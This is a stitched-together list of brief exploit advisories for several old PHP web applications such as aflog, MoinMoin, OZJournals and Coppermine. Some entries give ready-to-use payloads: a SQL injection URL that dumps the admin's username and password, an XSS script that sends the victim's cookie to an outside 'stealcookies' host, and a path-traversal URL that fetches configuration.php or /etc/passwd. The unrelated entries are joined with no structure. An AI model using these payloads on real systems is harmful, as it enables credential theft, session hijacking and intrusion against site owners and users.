SQL injection is possible in comments.php for the GET variable 'id', like this: http://hostname/aflog/comments.php?id='[SQLI]/*. The following POC exposes the username and password of the first registered user (the admin): http://localhost/aflog/comments.php?id='+UNION+SELECT+666,null,concat('username:',username,',password:',password),1,null,1+FROM+members+ORDER+BY+id+DESC+LIMIT+1/*. The same principle could be applied to view.php, but forming the SQL injection string is easier in comments.php, IMHO. A newly registered user can easily compose an URL with an XSS exploit and trick a logged in user to click it to steal their login cookie. Don't go <script>var a="<a href='http://server/stealcookies?"+encodeURI(document.cookie)+"'>here</a>";document.write(a);</script>.
This exploit allows an attacker to inject a malicious cookie into the MoinMoin 1.5.x web application. The malicious cookie can be used to overwrite a file on the server, allowing the attacker to gain access to the system. The exploit is coded in Python and requires the attacker to provide the URL of the MoinMoin application, the username, password, and email address of the user to be created, and the file to be overwritten.
A vulnerability exists in Forum Pay Per Post which allows an attacker to pull admin/user info from the database. The passwords are stored in plaintext and the admin login is at /admin/.
Lama Software kostenlos is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
We can download file present on the server... for example we can get the file of db credentials, configuration.php. Exploit: http://[www.example.com]/administrator/download.php?fileName=../configuration.php or try to get /etc/passwd :)
OZJournals uses .php-files as it's storage, and posts are read from them with the getcontents-function. This protects from traditional LFI-exploits, but the print -functionality, for instance, takes an id as a value, and allows an attacker to get the contents of files other than intended. Before printing the php-file is explode()d with "t", but seeing as many scripts have tabs in their configuration files, an attacker could, with some luck, fish out database credentials or other sensitive data.
A SQL injection vulnerability exists in boastMachine version 3.1 and prior. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'mail.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the admin panel of the application.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'month' parameter to '/blog.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the administrative panel.
This exploit is based on RST/GHC bugs and allows an attacker to inject malicious SQL code into the Coppermine gallery application. The exploit uses the 'UNION SELECT' statement to inject malicious code into the application.
This exploit allows remote attackers to execute arbitrary code via a long string in the USER command.
Services By CQR